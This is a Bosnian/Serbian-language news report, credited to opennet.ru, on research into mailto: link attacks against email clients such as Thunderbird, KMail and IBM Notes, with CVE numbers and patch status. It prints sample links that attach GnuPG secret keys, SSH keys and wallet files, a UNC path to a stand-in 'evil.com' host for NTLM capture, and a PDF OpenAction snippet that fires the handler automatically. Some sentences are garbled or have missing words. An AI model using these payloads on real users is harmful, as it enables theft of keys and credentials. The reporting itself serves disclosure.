Istraživači sa Univerziteta Ruhr u Bochumu (Njemačka) () ponašanje mail klijenata prilikom obrade “mailto:” linkova sa naprednim parametrima. Pet od dvadeset ispitanih klijenata e-pošte bilo je ranjivo na napad koji je manipulirao zamjenom resursa korištenjem parametra “attach”. Dodatnih šest klijenata e-pošte bilo je podložno napadu zamene PGP i S/MIME ključa, a tri klijenta su bila ranjiva na napad za izdvajanje sadržaja šifrovanih poruka.
Linkovi «"koriste se za automatizaciju otvaranja email klijenta kako bi se napisalo pismo primaocu navedenom na linku. Osim adrese, možete odrediti dodatne parametre kao dio veze, kao što su predmet pisma i šablon za tipičan sadržaj. Predloženi napad manipuliše parametrom "attach", koji vam omogućava da priložite prilog generisanoj poruci.
Klijenti za poštu Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) i Pegasus Mail bili su ranjivi na trivijalni napad koji vam omogućava automatsko priključivanje bilo koju lokalnu datoteku, specificiranu putem veze poput “mailto:?attach=path_to_file”. Fajl je priložen bez prikaza upozorenja, tako da bez posebne pažnje korisnik možda neće primijetiti da će pismo biti poslato s prilogom.
Na primjer, korištenjem veze kao što je „mailto:[email zaštićen]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" možete umetnuti privatne ključeve iz GnuPG-a u pismo. Također možete poslati sadržaj kripto novčanika (~/.bitcoin/wallet.dat), SSH ključeve (~/.ssh/id_rsa) i bilo koje datoteke dostupne korisniku. Štaviše, Thunderbird vam omogućava da priložite grupe datoteka po maski koristeći konstrukcije poput “attach=/tmp/*.txt”.
Pored lokalnih datoteka, neki klijenti e-pošte obrađuju veze do mrežne pohrane i staze na IMAP serveru. Konkretno, IBM Notes vam omogućava prijenos datoteke iz mrežnog direktorija prilikom obrade veza kao što je “attach=\\evil.com\dummyfile”, kao i presretanje NTLM parametara provjere autentičnosti slanjem veze na SMB server koji kontrolira napadač (zahtjev će biti poslan sa trenutnim korisnikom parametara autentifikacije).
Thunderbird uspješno obrađuje zahtjeve poput “attach=imap:///fetch>UID>/INBOX>1/”, koji vam omogućavaju da priložite sadržaj iz foldera na IMAP serveru. Istovremeno, poruke preuzete sa IMAP-a, šifrovane putem OpenPGP-a i S/MIME-a, klijent pošte automatski dešifruje pre slanja. Programeri Thunderbirda su bili o problemu u februaru iu broju problem je već riješen (Thunderbird grane 52, 60 i 68 ostaju ranjive).
Stare verzije Thunderbird-a su također bile ranjive na dvije druge varijante napada na PGP i S/MIME koje su predložili istraživači. Konkretno, Thunderbird, kao i OutLook, PostBox, eM Client, MailMate i R2Mail2, bio je podvrgnut napadu zamjene ključa, uzrokovan činjenicom da mail klijent automatski uvozi i instalira nove certifikate koji se prenose u S/MIME porukama, što omogućava napadač organizira zamjenu javnih ključeva koje je korisnik već pohranio.
Drugi napad, kojem su podložni Thunderbird, PostBox i MailMate, manipuliše karakteristikama mehanizma za automatsko čuvanje nacrta poruka i omogućava, koristeći mailto parametre, da pokrene dešifrovanje šifrovanih poruka ili dodavanje digitalnog potpisa za proizvoljne poruke, sa naknadni prijenos rezultata na IMAP server napadača. U ovom napadu, šifrirani tekst se prenosi preko parametra “body”, a oznaka “meta refresh” se koristi za iniciranje poziva na IMAP server napadača. Na primjer: ' '
Za automatsku obradu “mailto:” linkova bez interakcije korisnika, mogu se koristiti posebno dizajnirani PDF dokumenti - OpenAction akcija u PDF-u vam omogućava da automatski pokrenete mailto handler prilikom otvaranja dokumenta:
%PDF-1.5
1 0 obj
<< /Tip /Katalog /OpenAction [2 0 R] >>
endobj
2 0 obj
<< /Type /Action /S /URI/URI (mailto:?body=——BEGIN PGP MESSAGE——[…])>>
endobj
izvor: opennet.ru